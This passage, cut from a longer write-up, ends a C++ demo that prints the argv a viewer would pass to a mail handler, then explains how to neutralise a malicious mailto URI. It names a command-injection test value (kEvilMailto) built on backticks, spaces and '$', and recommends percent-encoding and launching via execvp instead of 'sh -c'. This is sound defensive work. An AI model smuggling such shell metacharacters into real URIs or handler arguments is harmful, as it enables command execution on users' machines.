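    for (const std::string& a : build_handler_argv("$USER_BROWSER -remote", kEvilMailto))
        std::cout << "argv   : " << a << '\n';
    return 0;
}
```

Build with g++ -std=c++11 and run it without USER_BROWSER set to see the argv that would reach execvp(). The quoted form is what the report's first fix would hand to "sh -c"; the mapped form is what leaves the viewer if the URI is sanitised before any handler sees it. The report's own legitimate "Martyn%20Gilmore<gilmore@floraxion.com>" target survives as a decodable URI, while the backtick, the space and the "$" of the payload become %60, %20 and %24 and cannot be re-evaluated by a downstream wrapper. Whether to percent-encode "&" and ";" is the trade-off a real viewer has to make against mailto query strings; the argv launch is the part that costs nothing.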